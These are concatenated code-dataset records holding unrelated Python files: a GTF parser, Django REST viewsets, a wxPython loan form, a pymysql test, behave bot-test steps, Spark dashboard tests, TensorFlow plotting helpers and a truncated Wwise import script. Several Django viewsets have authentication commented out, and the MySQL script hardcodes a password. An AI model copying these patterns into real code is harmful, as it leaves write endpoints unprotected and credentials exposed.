chromlist]\n#parser=GFFParser()\n#parser.parseGFF(filelist)\n#parser.Process()\n#parser.save('{0}/features.txt'.format(basepath))\n\n\nbasepath=\"C:/Data/Genomes/Human\"\nfilelist=['{0}/Homo_sapiens.GRCh37.68.gtf'.format(basepath)]\nparser=GFFParser()\nparser.parseGTF(filelist)\nparser.Process()\nparser.save('{0}/features.txt'.format(basepath))","sub_path":"Src/ConversionTools/ConvertGFF.py","file_name":"ConvertGFF.py","file_ext":"py","file_size_in_byte":7199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"400794502","text":"from rest_framework import viewsets\nfrom rest_framework.decorators import detail_route\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.response import Response\nfrom rest_framework_extensions.mixins 
import PaginateByMaxMixin\nfrom django.http import JsonResponse\n\nfrom api.models import *\nfrom api.serializers import *\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated\n\n\nclass GraphViewSet(PaginateByMaxMixin, viewsets.ModelViewSet):\n serializer_class = GraphSerializer\n # authentication_classes = (TokenAuthentication,)\n # permission_classes = (IsAuthenticated,)\n queryset = GraphBase.objects.all()\n\n\nclass InstanceViewSet(PaginateByMaxMixin, viewsets.ModelViewSet):\n serializer_class = InstanceSerializer\n # resource_name = False\n\n @detail_route(methods=['post'])\n def link(self, request, pk=None):\n graph_id = request.data.get('graph_id', None)\n source_id = request.data.get('source_id', None)\n target_id = request.data.get('target_id', None)\n link = ComponentLink.objects.filter(pk=pk).first()\n source = ComponentPort.objects.filter(uuid=source_id, instance__graph_id=graph_id).first()\n target = ComponentPort.objects.filter(uuid=target_id, instance__graph_id=graph_id).first()\n link.source = source\n link.target = target\n source_instance = ComponentInstance.objects.filter(id=source.instance_id).first()\n target_instance = ComponentInstance.objects.filter(id=target.instance_id).first()\n link_title = source_instance.title + target_instance.title\n link.title = link_title\n link.save()\n serializer = self.get_serializer(link, many=False)\n return Response(serializer.data)\n\n @detail_route(methods=['post'])\n def embed(self, request, pk=None):\n graph_id = request.data.get('graph_id', None)\n parent_id = request.data.get('parent_id', None)\n child = NestedComponent.objects.filter(pk=pk).first()\n child.parent = NestedComponent.objects.filter(uuid=parent_id, instance__graph_id=graph_id).first()\n child.save()\n serializer = self.get_serializer(child, many=False)\n return Response(serializer.data)\n\n @detail_route(methods=['post'], parser_classes=(JSONParser,))\n def ports(self, request, pk=None):\n\n new_ports = request.data.get('ports', [])\n instance = ComponentInstance.objects.filter(pk=pk).first()\n\n old_ports = list(ComponentPort.objects.filter(instance=instance).all())\n for port in old_ports:\n for new_port in new_ports:\n if port.uuid == new_port['id']:\n port.title = new_port['label']\n port.type = new_port['type']\n port.save()\n new_ports.remove(new_port)\n old_ports.remove(port)\n\n for port in old_ports:\n port.delete()\n\n for port in new_ports:\n ComponentPort.objects.create(uuid=port['id'], title=port['label'], type=port['type'], instance=instance)\n\n serializer = self.get_serializer(instance, many=False)\n return Response(serializer.data)\n\n def get_queryset(self):\n graph_id = self.request.query_params.get('graph_id', None)\n uuid = self.request.query_params.get('uuid', None)\n if graph_id is not None:\n queryset = ComponentInstance.objects.filter(graph_id=graph_id)\n if uuid is not None:\n queryset = ComponentInstance.objects.filter(graph_id=graph_id, uuid=uuid)\n else:\n queryset = ComponentInstance.objects.filter()\n qs = InstanceSerializer(queryset)\n return queryset\n\n def perform_destroy(self, instance):\n target_links = ServiceLink.objects.filter(target_id=instance.id).all()\n for link in target_links:\n source = link.source\n source_links = ServiceLink.objects.filter(source_id=source.id).all()\n if source_links.count() <= 1:\n if source.id is not None:\n source.delete()\n instance.delete()\n\n def perform_create(self, serializer):\n graph = 
GraphBase.objects.filter(id=self.request.data['graph_id']).first()\n component = Component.objects.filter(id=self.request.data['component_id']).first()\n\n base_instance = component.get_base_instance()\n\n new_instance = serializer.save(graph=graph, component=component, properties=base_instance.properties,\n artifacts=base_instance.artifacts)\n new_instance.save()\n\n x_change = base_instance.last_x - new_instance.last_x\n y_change = base_instance.last_y - new_instance.last_y\n\n component.clone_instances_in_graph(graph, x_change, y_change, new_instance)\n\n\nclass PortViewSet(PaginateByMaxMixin, viewsets.ModelViewSet):\n serializer_class = PortSerializer\n # authentication_classes = (TokenAuthentication,)\n # permission_classes = (IsAuthenticated,)\n # queryset = ComponentPort.objects.all()\n\n def get_queryset(self):\n port_id = self.request.query_params.get('port_id', None)\n instance_id = self.request.query_params.get('instance_id', None)\n if port_id is not None:\n queryset = ComponentPort.objects.filter(pk=port_id)\n elif instance_id is not None:\n queryset = ComponentPort.objects.filter(instance=instance_id)\n else:\n queryset = ComponentPort.objects.filter()\n return queryset\n\n def perform_create(self, serializer):\n instance = dict(self.request.data.get('instance', None))\n if 'id' in instance:\n port = serializer.save(instance_id=instance['id'])\n\n\nclass ServiceLinkViewSet(PaginateByMaxMixin, viewsets.ModelViewSet):\n serializer_class = ServiceLinkSerializer\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated,)\n queryset = ServiceLink.objects.all()\n\n def get_queryset(self):\n graph_id = self.request.query_params.get('graph_id', None)\n uuid = self.request.query_params.get('uuid', None)\n if graph_id is not None:\n queryset = ServiceLink.objects.filter(graph_id=graph_id)\n if uuid is not None:\n queryset = ServiceLink.objects.filter(graph_id=graph_id, uuid=uuid)\n else:\n queryset = ServiceLink.objects.filter(graph__user=self.request.user)\n return queryset\n\n def perform_create(self, serializer):\n graph = dict(self.request.data.get('graph', None))\n source = dict(self.request.data.get('source', None))\n target = dict(self.request.data.get('target', None))\n if 'id' in graph and 'id' in source and 'id' in target:\n serializer.save(graph_id=graph['id'], source_id=source['id'], target_id=target['id'])\n\n\nclass DependencyLinkViewSet(PaginateByMaxMixin, viewsets.ModelViewSet):\n serializer_class = DependencyLinkSerializer\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated,)\n queryset = DependencyLink.objects.all()\n\n def get_queryset(self):\n graph_id = self.request.query_params.get('graph_id', None)\n uuid = self.request.query_params.get('uuid', None)\n if graph_id is not None:\n queryset = DependencyLink.objects.filter(graph_id=graph_id)\n if uuid is not None:\n queryset = DependencyLink.objects.filter(graph_id=graph_id, uuid=uuid)\n else:\n queryset = DependencyLink.objects.filter(graph__user=self.request.user)\n return queryset\n\n def perform_create(self, serializer):\n graph = dict(self.request.data.get('graph', None))\n dependant = dict(self.request.data.get('dependant', None))\n dependency = dict(self.request.data.get('dependency', None))\n if 'id' in graph and 'id' in dependant and 'id' in dependency:\n serializer.save(graph_id=graph['id'], dependant_id=dependant['id'], 
dependency_id=dependency['id'])\n","sub_path":"api/views/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":8087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"574317401","text":"# -*- coding: cp1252 -*-\nimport wx\n\nclass MainPage(wx.Panel):\n    def __init__(self, parent):\n        wx.Panel.__init__(self, parent)\n\n        # sizers\n        mainSizer = wx.BoxSizer(wx.VERTICAL)\n        grid = wx.GridBagSizer(hgap=5, vgap=5)\n        hSizer = wx.BoxSizer(wx.HORIZONTAL)\n\n        # heading\n        self.fyrirsogn = wx.StaticText(self, label=\"What should be done with the money?\")\n        self.fyrirsognFont = wx.Font(16, wx.DEFAULT, wx.NORMAL, wx.NORMAL)\n        self.fyrirsogn.SetFont(self.fyrirsognFont)\n        mainSizer.Add(self.fyrirsogn)\n\n        mainSizer.Add(grid, 0, wx.ALL, 5)\n\n        # labels for the loans\n        self.stadaLana = wx.StaticText(self, label=\"Loan status\") \n        grid.Add(self.stadaLana, pos=(0,0))\n\n        self.vextir = wx.StaticText(self, label=\"Interest\")\n        grid.Add(self.vextir, pos=(0,2))\n\n        self.greidslubyrgdi = wx.StaticText(self, label=\"Payment burden\")\n        grid.Add(self.greidslubyrgdi, pos=(0,4))\n\n        self.verdtryggtLan = wx.StaticText(self, label=\"Indexed/non-indexed\")\n        grid.Add(self.verdtryggtLan, pos=(0,6))\n        '''\n        \"HARDCODED\"\n        # inputs and options for the loans\n        self.lan1 = wx.TextCtrl(self, size = (80,20))\n        grid.Add(self.lan1, pos=(1,0))\n        self.kr11 = wx.StaticText(self, label=\"kr.\")\n        grid.Add(self.kr11, pos=(1,1))\n\n        self.vextir1 = wx.TextCtrl(self, size = (50,20))\n        grid.Add(self.vextir1, pos=(1,2))\n        self.prosenta = wx.StaticText(self, label=\"%\")\n        grid.Add(self.prosenta, pos=(1,3))\n\n        self.greidslubyrgdi1 = wx.TextCtrl(self, size = (80,20))\n        grid.Add(self.greidslubyrgdi1, pos=(1,4))\n        self.kr12 = wx.StaticText(self, label=\"kr.\")\n        grid.Add(self.kr12, pos=(1,5))\n        \n        radioList1 = ['Indexed', 'Non-indexed']\n        #self.radios1 = wx.RadioBox(self, choices=radioList1, majorDimension=3, style=wx.RA_SPECIFY_COLS)\n        self.radios1 = wx.RadioBox(self, choices=radioList1)\n        #grid.Add(self.radios1, pos=(1,3), span=(1,2))\n        grid.Add(self.radios1, pos=(1,6))\n\n        '''\n        self.radioList = ['Indexed', 'Non-indexed']\n        \n        # we can make this grid \"interactive\" with this\n        self.fjoldiLana = 3\n        \n        for i in range(1, self.fjoldiLana+1):\n            # input for loan i - self.lani\n            lan = 'lan' + str(i)\n            setattr(self, lan, wx.TextCtrl(self, size = (80,20))) \n            grid.Add(object.__getattribute__(self, lan), pos=(i,0))\n            \n            # kr. label for the loan amount - self.kronai1\n            krona1 = 'krona' + str(i) + '1'\n            setattr(self, krona1, wx.StaticText(self, label='kr.'))\n            grid.Add(object.__getattribute__(self, krona1), pos=(i,1))\n            \n            # input for interest - self.vextiri\n            vextir = 'vextir' + str(i)\n            setattr(self, vextir, wx.TextCtrl(self, size = (50,20)))\n            grid.Add(object.__getattribute__(self, vextir), pos=(i,2))\n\n            # percent sign - self.prosentai\n            prosenta = 'prosenta' + str(i)\n            setattr(self, prosenta, wx.StaticText(self, label='%'))\n            grid.Add(object.__getattribute__(self, prosenta), pos=(i,3))\n\n            # payment burden - self.greidslubyrgdii\n            greidslubyrgdi = 'greidslubyrgdi' + str(i)\n            setattr(self, greidslubyrgdi, wx.TextCtrl(self, size = (80,20)))\n            grid.Add(object.__getattribute__(self, greidslubyrgdi), pos=(i,4))\n            \n            # kr. 
label for the payment burden - self.kronai2\n            krona2 = 'krona' + str(i) + '2'\n            setattr(self, krona2, wx.StaticText(self, label='kr.'))\n            grid.Add(object.__getattribute__(self, krona2), pos=(i,5))\n\n            # radio buttons for indexation - self.verdtryggingi\n            verdtrygging = 'verdtrygging' + str(i)\n            setattr(self, verdtrygging, wx.RadioBox(self, choices=self.radioList))\n            grid.Add(object.__getattribute__(self, verdtrygging), pos=(i,6))\n        \n        \n        \n        self.SetSizerAndFit(mainSizer)\n        \n\napp = wx.App(False)\nframe = wx.Frame(None, title=\"First version\")\nframe.SetSize((600,500))\npanel = MainPage(frame)\nframe.Show()\napp.MainLoop()\n","sub_path":"main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"11363285","text":"#!/usr/bin/env python\n\nimport pymysql \n\ndb=pymysql.connect('localhost','pi','1234','test')\ncur=db.cursor()\ncur.execute('select * from student')\nwhile True:\n\tstudent = cur.fetchone()\n\tif not student :\n\t\tbreak\n\tprint(student)\ncur.close()\ndb.close()\n","sub_path":"gpio/mysqltest.py","file_name":"mysqltest.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"565408560","text":"from behave import *\nfrom base.user_telegram import User\nfrom base.functions import check_message_by_list, get_random_month_day\nimport re\nimport datetime\n\n\n\"\"\"Steps in Spacebot\"\"\"\n\n#convert to int\ndef to_int(text):\n    return int(text)\nregister_type(Number=to_int)\n\n#available roles in Spacebot\nrole_dict={\n    'user' : 'context.user',\n    'lvl1_1' : 'context.lvl1_1',\n    'lvl1_2' : 'context.lvl1_2',\n    'pr_1' : 'context.pr_1',\n    'pr_2' : 'context.pr_2',\n    'hr_1' : 'context.hr_1',\n    'hr_2' : 'context.hr_2',\n    'project' : 'context.project',\n    'cyprus' : 'context.cyprus',\n\n}\n\n@step(\"{role} click the button -{button}- quantity {number:Number}\")\ndef step_impl(context, role, button, number):\n    context_role = eval(role_dict[role])\n    client = User(context_role, context.bot[0])\n    client.click_button(button,mess_quant=number)\n\n@step(\"{role} click the button -{button}- in ticket_bot # {bot:Number} quantity {number:Number}\")\ndef step_impl(context, role, button, bot, number):\n    context_role = eval(role_dict[role])\n    client = User(context_role, context.bot[bot])\n    client.click_button(button,mess_quant=number)\n\n@step(\"{role} check data of tickets quantity {number:Number}\")\ndef step_impl(context, role, number):\n    context_role = eval(role_dict[role])\n    client = User(context_role, context.bot[0])\n    messages = client.get_messages(quantity_mess=number)\n    for message in messages:\n        if message.text.startswith(context.list_info_ticket[0]):\n            assert check_message_by_list(message.text, context.list_info_ticket)\n\n@step(\"{role} check data of tickets in ticket_bot # {bot:Number}\")\ndef step_impl(context, role, bot):\n    context_role = eval(role_dict[role])\n    client = User(context_role, context.bot[bot])\n    messages = client.get_messages()\n    for message in messages:\n        if message.text.startswith('Тикет 👐 '+context.list_info_ticket[0][1:]):\n            assert check_message_by_list(message.text, context.list_info_ticket[1:3])\n\n@step(\"{role} check message : -{message}- quantity {number:Number}\")\ndef step_impl(context, role, message, number):\n    context_role = eval(role_dict[role])\n    agent = User(context_role, context.bot[0])\n    assert agent.check_message(message, 
mess_quant=number)\n\n@step(\"{role} check empty message : -{message}- quantity {number:Number}\")\ndef step_impl(context, role, message, number):\n context_role = eval(role_dict[role])\n agent = User(context_role, context.bot[0])\n assert agent.check_message(message, mess_quant=number) is False\n\n@step(\"{role} check message : -{message}- in bot # {bot:Number} quantity {number:Number}\")\ndef step_impl(context, role, message, bot, number):\n context_role = eval(role_dict[role])\n agent = User(context_role, context.bot[bot])\n assert agent.check_message(message, mess_quant=number)\n\n@step(\"{role} - empty button -{button}-\")\ndef step_impl(context, role, button):\n context_role = eval(role_dict[role])\n client = User(context_role, context.bot[0])\n assert client.button_is_disappeared(button, mess_quant=3)\n\n@step(\"{role} - send message -{message}-\")\ndef step_impl(context,role, message):\n context_role = eval(role_dict[role])\n client = User(context_role, context.bot[0])\n client.send_message(message)\n\n@step(\"{role} - add event to list_info_ticket: -{message}-\")\ndef step_impl(context, role, message):\n context_role = eval(role_dict[role])\n client = User(context_role, context.bot[0])\n profile = client.get_profile_fl_name_username()\n # if 'Дата' in message:\n # 'Дата от: 2020-11-05 00:00:00'\n # context.list_info_ticket.append(message)\n if 'Коммент от' in message:\n result = re.search(r'(\\(.+\\))', profile)\n context.list_info_ticket.append('Коммент от '+result.group(0)[1:-1]+': comment')\n elif 'Тикет принял:' in message or 'Task closed:' in message:\n context.list_info_ticket.append(message+profile)\n else:\n context.list_info_ticket.append(message)\n\n@step(\"{role} - check photo or another media\")\ndef step_impl(context, role):\n context_role = eval(role_dict[role])\n agent = User(context_role, context.bot[0])\n messages = agent.get_messages(quantity_mess=3)\n if messages[0].media:\n assert True\n else:\n assert False\n\n@step(\"{role} - choose {variant} time interval\")\ndef step_impl(context, role, variant):\n context_role = eval(role_dict[role])\n agent = User(context_role, context.bot[0])\n current_data = datetime.date.today()\n\n if variant == 'correct':\n first_number = get_random_month_day()\n second_number = get_random_month_day(min_val=first_number)\n elif variant == 'incorrect':\n first_number = get_random_month_day()\n second_number = get_random_month_day(max_val=first_number-1)\n\n date_from = 'Дата от: {0}-{1}-{2} 00:00:00'.format(current_data.year, str(current_data.month).zfill(2),str(first_number).zfill(2))\n date_till = 'Дата до: {0}-{1}-{2} 00:00:00'.format(current_data.year, str(current_data.month).zfill(2),str(second_number).zfill(2))\n\n agent.click_button('^{}$'.format(first_number), mess_quant=2)\n assert agent.check_message(date_from, mess_quant=1)\n\n agent.click_button('^{}$'.format(second_number), mess_quant=2)\n assert agent.check_message(date_till, mess_quant=1)\n","sub_path":"features/steps/space_general.py","file_name":"space_general.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"524837880","text":"import functools\n\nimport boto3\nimport pytest\nfrom click.testing import CliRunner\nfrom moto import mock_s3\n\nfrom mozetl.topline import topline_dashboard as topline\nfrom mozetl.topline.schema import historical_schema, topline_schema\n\ndefault_sample = {\n \"geo\": \"US\",\n \"channel\": \"nightly\",\n \"os\": \"Windows\",\n \"hours\": 
1.0,\n    \"crashes\": 1,\n    \"google\": 1,\n    \"bing\": 1,\n    \"yahoo\": 1,\n    \"other\": 1,\n    \"actives\": 1,\n    \"new_records\": 1,\n    \"default\": 1,\n    \"report_start\": \"20160101\",\n}\n\n\n@pytest.fixture()\ndef generate_data(dataframe_factory):\n    return functools.partial(\n        dataframe_factory.create_dataframe, base=default_sample, schema=topline_schema\n    )\n\n\n@pytest.fixture()\ndef simple_df(generate_data):\n    return generate_data(None)\n\n\n@pytest.fixture()\ndef multi_df(generate_data):\n    snippets = [{\"geo\": \"CA\"}, {\"channel\": \"release\"}, {\"os\": \"Linux\"}]\n    return generate_data(snippets)\n\n\n# reformatted data filters out ROW into Other\ndef test_reformat_filters_ROW(generate_data):\n    # Maldives is not a target region\n    input_df = generate_data([{\"geo\": \"MV\"}])\n    df = topline.reformat_data(input_df)\n\n    assert df.where(\"geo='MV'\").count() == 0\n    assert df.where(\"geo='Other'\").count() > 0\n\n\ndef test_reformat_generates_rows_with_all(simple_df):\n    \"\"\" The output of the dataset should contain 2^3 values. The\n    cardinality of each dimension is 2 because of the additional `all`\n    label.\"\"\"\n    df = topline.reformat_data(simple_df)\n\n    assert df.count() == 8\n\n\ndef test_reformat_prunes_empty_rows_with_all(multi_df):\n    \"\"\" This test should generate 16 results where any of the rows\n    contains `all` in any of the attribute fields. The cardinality of\n    the cross product is 27. Don't include any rows that do not\n    contain 'all'. Don't include rows that contain values of 0. This\n    removes 2^3 results immediately, leaving 19 rows. We get rid of the\n    extra three from the tuples containing only a single `all`.\n\n    ('CA', 'release', 'all'),\n    ('CA', 'all', 'Linux'),\n    ('all', 'release','Linux')\n\n    should not exist and contain empty rows. 
This leaves 16 results.\"\"\"\n df = topline.reformat_data(multi_df)\n\n # This row should be pruned\n assert df.where(\"geo='CA' AND channel='release'\").count() == 0\n\n # This should be the accurate count at the end\n assert df.where(\"geo='all' OR channel='all' OR os='all'\").count() == 16\n\n\n# reformatted data correctly aggregates all values\ndef test_reformat_aggregates(multi_df):\n df = topline.reformat_data(multi_df)\n\n rows = df.where(\"geo='all' AND channel='all' AND os='all'\").head()\n assert rows.hours == 3.0\n\n\ndef test_reformat_conforms_to_historical_schema(simple_df):\n df = topline.reformat_data(simple_df)\n\n assert df.columns == historical_schema.names\n\n\n@mock_s3\ndef test_cli_monthly(simple_df, tmpdir, monkeypatch):\n # set up moto with a fake bucket\n bucket = \"test-bucket\"\n prefix = \"test-prefix\"\n\n conn = boto3.resource(\"s3\", region_name=\"us-west-2\")\n conn.create_bucket(Bucket=bucket)\n\n # change s3_path to use file:// protocol\n def mock_format_spark_path(bucket, prefix):\n return \"file://{}/{}\".format(bucket, prefix)\n\n monkeypatch.setattr(topline, \"format_spark_path\", mock_format_spark_path)\n\n # write test data to local path\n input_bucket = str(tmpdir)\n test_path = topline.format_spark_path(\n input_bucket, \"topline_summary/v1/mode=monthly\"\n )\n simple_df.write.partitionBy(\"report_start\").parquet(test_path)\n\n # Run the application via the cli\n runner = CliRunner()\n args = [\"monthly\", bucket, prefix, \"--input_bucket\", input_bucket]\n result = runner.invoke(topline.main, args)\n assert result.exit_code == 0\n\n # read results using boto\n body = (\n conn.Object(bucket, prefix + \"/topline-monthly.csv\")\n .get()[\"Body\"]\n .read()\n .decode(\"utf-8\")\n )\n\n # header + 8x rows = 9\n assert len(body.rstrip().split(\"\\n\")) == 9\n","sub_path":"tests/test_topline_dashboard.py","file_name":"test_topline_dashboard.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"480182887","text":"# code refactored from Magnus Erik Hvass Pedersen tutorials\n\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\nimport math\n\nclass Util(object):\n \n def plot_image(self, image, img_shape=(28,28)):\n plt.imshow(image.reshape(img_shape),\n interpolation='nearest',\n cmap='binary')\n\n plt.show()\n \n def plot_images(self, images, cls_true, cls_pred=None, img_size=28, img_shape=(28,28)):\n assert len(images) == len(cls_true) == 9\n\n # Create figure with 3x3 sub-plots.\n fig, axes = plt.subplots(3, 3)\n fig.subplots_adjust(hspace=0.3, wspace=0.3)\n\n for i, ax in enumerate(axes.flat):\n # Plot image.\n ax.imshow(images[i].reshape(img_shape), cmap='binary')\n\n # Show true and predicted classes.\n if cls_pred is None:\n xlabel = \"True: {0}\".format(cls_true[i])\n else:\n xlabel = \"True: {0}, Pred: {1}\".format(cls_true[i], cls_pred[i])\n\n # Show the classes as the label on the x-axis.\n ax.set_xlabel(xlabel)\n\n # Remove ticks from the plot.\n ax.set_xticks([])\n ax.set_yticks([])\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n def plot_images_2(self, images, cls_true, class_names, cls_pred=None, smooth=True):\n assert len(images) == len(cls_true) == 9\n\n # Create figure with sub-plots.\n fig, axes = plt.subplots(3, 3)\n\n # Adjust vertical spacing if we need to print ensemble and best-net.\n if cls_pred is None:\n 
hspace = 0.3\n else:\n hspace = 0.6\n fig.subplots_adjust(hspace=hspace, wspace=0.3)\n\n for i, ax in enumerate(axes.flat):\n # Interpolation type.\n if smooth:\n interpolation = 'spline16'\n else:\n interpolation = 'nearest'\n\n # Plot image.\n ax.imshow(images[i, :, :, :],\n interpolation=interpolation)\n\n # Name of the true class.\n cls_true_name = class_names[cls_true[i]]\n\n # Show true and predicted classes.\n if cls_pred is None:\n xlabel = \"True: {0}\".format(cls_true_name)\n else:\n # Name of the predicted class.\n cls_pred_name = class_names[cls_pred[i]]\n\n xlabel = \"True: {0}\\nPred: {1}\".format(cls_true_name, cls_pred_name)\n\n # Show the classes as the label on the x-axis.\n ax.set_xlabel(xlabel)\n\n # Remove ticks from the plot.\n ax.set_xticks([])\n ax.set_yticks([])\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n def print_test_accuracy(self, session, data, x, y_true, y_pred_cls, num_classes, \n show_example_errors=False,\n show_confusion_matrix=False):\n\n # Split the test-set into smaller batches of this size.\n test_batch_size = 256\n\n # Number of images in the test-set.\n num_test = len(data.test.images)\n\n # Allocate an array for the predicted classes which\n # will be calculated in batches and filled into this array.\n cls_pred = np.zeros(shape=num_test, dtype=np.int)\n\n # Now calculate the predicted classes for the batches.\n # We will just iterate through all the batches.\n # There might be a more clever and Pythonic way of doing this.\n\n # The starting index for the next batch is denoted i.\n i = 0\n\n while i < num_test:\n # The ending index for the next batch is denoted j.\n j = min(i + test_batch_size, num_test)\n\n # Get the images from the test-set between index i and j.\n images = data.test.images[i:j, :]\n\n # Get the associated labels.\n labels = data.test.labels[i:j, :]\n\n # Create a feed-dict with these images and labels.\n feed_dict = {x: images,\n y_true: labels}\n\n # Calculate the predicted class using TensorFlow.\n cls_pred[i:j] = session.run(y_pred_cls, feed_dict=feed_dict)\n\n # Set the start-index for the next batch to the\n # end-index of the current batch.\n i = j\n\n # Convenience variable for the true class-numbers of the test-set.\n cls_true = data.test.cls\n\n # Create a boolean array whether each image is correctly classified.\n correct = (cls_true == cls_pred)\n\n # Calculate the number of correctly classified images.\n # When summing a boolean array, False means 0 and True means 1.\n correct_sum = correct.sum()\n\n # Classification accuracy is the number of correctly classified\n # images divided by the total number of images in the test-set.\n acc = float(correct_sum) / num_test\n\n # Print the accuracy.\n msg = \"Accuracy on Test-Set: {0:.1%} ({1} / {2})\"\n print(msg.format(acc, correct_sum, num_test))\n\n # Plot some examples of mis-classifications, if desired.\n if show_example_errors:\n print(\"Example errors:\")\n self.plot_example_errors(data=data, cls_pred=cls_pred, correct=correct)\n\n # Plot the confusion matrix, if desired.\n if show_confusion_matrix:\n print(\"Confusion Matrix:\")\n self.plot_confusion_matrix(data=data, num_classes=num_classes, cls_pred=cls_pred)\n\n\n def plot_confusion_matrix(self, data, num_classes, cls_pred):\n # This is called from print_test_accuracy() below.\n\n # cls_pred is an array of the predicted class-number for\n # all images in the test-set.\n\n # Get the true classifications for the test-set.\n cls_true = data.test.cls\n\n 
# Get the confusion matrix using sklearn.\n cm = confusion_matrix(y_true=cls_true,\n y_pred=cls_pred)\n\n # Print the confusion matrix as text.\n print(cm)\n\n # Plot the confusion matrix as an image.\n plt.matshow(cm)\n\n # Make various adjustments to the plot.\n plt.colorbar()\n tick_marks = np.arange(num_classes)\n plt.xticks(tick_marks, range(num_classes))\n plt.yticks(tick_marks, range(num_classes))\n plt.xlabel('Predicted')\n plt.ylabel('True')\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n def plot_example_errors(self, data, cls_pred, correct):\n # This function is called from print_test_accuracy() below.\n\n # cls_pred is an array of the predicted class-number for\n # all images in the test-set.\n\n # correct is a boolean array whether the predicted class\n # is equal to the true class for each image in the test-set.\n\n # Negate the boolean array.\n incorrect = (correct == False)\n\n # Get the images from the test-set that have been\n # incorrectly classified.\n images = data.test.images[incorrect]\n\n # Get the predicted classes for those images.\n cls_pred = cls_pred[incorrect]\n\n # Get the true classes for those images.\n cls_true = data.test.cls[incorrect]\n\n # Plot the first 9 images.\n self.plot_images(images=images[0:9],\n cls_true=cls_true[0:9],\n cls_pred=cls_pred[0:9])\n\n\n def plot_weights(self, session, weights, img_shape=(28,28)):\n # Get the values for the weights from the TensorFlow variable.\n w = session.run(weights)\n\n # Get the lowest and highest values for the weights.\n # This is used to correct the colour intensity across\n # the images so they can be compared with each other.\n w_min = np.min(w)\n w_max = np.max(w)\n\n # Create figure with 3x4 sub-plots,\n # where the last 2 sub-plots are unused.\n fig, axes = plt.subplots(3, 4)\n fig.subplots_adjust(hspace=0.3, wspace=0.3)\n\n for i, ax in enumerate(axes.flat):\n # Only use the weights for the first 10 sub-plots.\n if i<10:\n # Get the weights for the i'th digit and reshape it.\n # Note that w.shape == (img_size_flat, 10)\n image = w[:, i].reshape(img_shape)\n\n # Set the label for the sub-plot.\n ax.set_xlabel(\"Weights: {0}\".format(i))\n\n # Plot the image.\n ax.imshow(image, vmin=w_min, vmax=w_max, cmap='seismic')\n\n # Remove ticks from each sub-plot.\n ax.set_xticks([])\n ax.set_yticks([])\n \n def plot_conv_weights(self, session, weights, input_channel=0):\n # Assume weights are TensorFlow ops for 4-dim variables\n # e.g. weights_conv1 or weights_conv2.\n\n # Retrieve the values of the weight-variables from TensorFlow.\n # A feed-dict is not necessary because nothing is calculated.\n w = session.run(weights)\n\n # Get the lowest and highest values for the weights.\n # This is used to correct the colour intensity across\n # the images so they can be compared with each other.\n w_min = np.min(w)\n w_max = np.max(w)\n\n # Number of filters used in the conv. 
layer.\n num_filters = w.shape[3]\n\n # Number of grids to plot.\n # Rounded-up, square-root of the number of filters.\n num_grids = math.ceil(math.sqrt(num_filters))\n\n # Create figure with a grid of sub-plots.\n fig, axes = plt.subplots(num_grids, num_grids)\n\n # Plot all the filter-weights.\n for i, ax in enumerate(axes.flat):\n # Only plot the valid filter-weights.\n if i\"\n\n # \"\\\\Actor-Mixer Hierarchy\\\\Script Import\\\\Test 0\\\\Container 0\\\\My SFX 0\"\n if baseDirName:\n objectPath = \"\"+baseDirName+\"\\\\\"\n else:\n objectPath = \"\"\n\n sectionActorMixer = \"\"+MyComponent.INPUT_SectionName+\"\\\\\"\n\n importFilelist.append(\n {\n \"audioFile\": fileList,\n #\"objectPath\": \"\"+os.path.basename(audiofilename\n \"objectPath\": sectionActorMixer + objectPath + objectType + os.path.basename(audiofilename)\n #\"objectPath\": \"\" + os.path.basename(audiofilename)\n }\n )\n MyComponent.importArgs = {\n \"importOperation\": \"useExisting\",\n \"default\": {\n \"importLanguage\": MyComponent.ImportLanguage,\n \"importLocation\": ParentID,\n \"originalsSubFolder\": originalsPath+originalsSubDir,\n \"notes\":\"This object was auto imported\",\n \"@IsStreamingEnabled\": MyComponent.OPTION_IsStreaming,\n \"@IsZeroLantency\": MyComponent.OPTION_IsStreaming,\n \"event\": eventPath+\"\\\\\"+os.path.basename(audiofilename)+\"@Play\"\n #,\"ErrorTest\":\"Failme\"\n },\n \"imports\": importFilelist,\n #\"autoAddToSourceControl\": True #not yet supported\n }\n\n def importAudioFiles(args):\n try:\n yield from self.call(WAAPI_URI.ak_wwise_core_audio_import, {}, **args)\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n MyComponent.ImportOperationSuccess = False\n cancelUndoGroup()\n else:\n MyComponent.ImportOperationSuccess = True\n\n def SetupImportParentObject(objectName):\n # Setting up the import parent object\n arguments = {\n \"from\": {\"path\": [\"\\Actor-Mixer Hierarchy\"]},\n \"transform\": [\n {\"select\":['descendants']},\n {\"where\": [\"name:matches\", objectName]}\n ],\n \"options\": {\n \"return\": [\"id\",\"type\", \"name\", \"path\"]\n }\n }\n try:\n res = yield from self.call(WAAPI_URI.ak_wwise_core_object_get, **arguments)\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n cancelUndoGroup()\n else:\n ID = \"\"\n obj = \"\"\n path = \"\"\n for x in res.kwresults[\"return\"]:\n if x[\"type\"] == 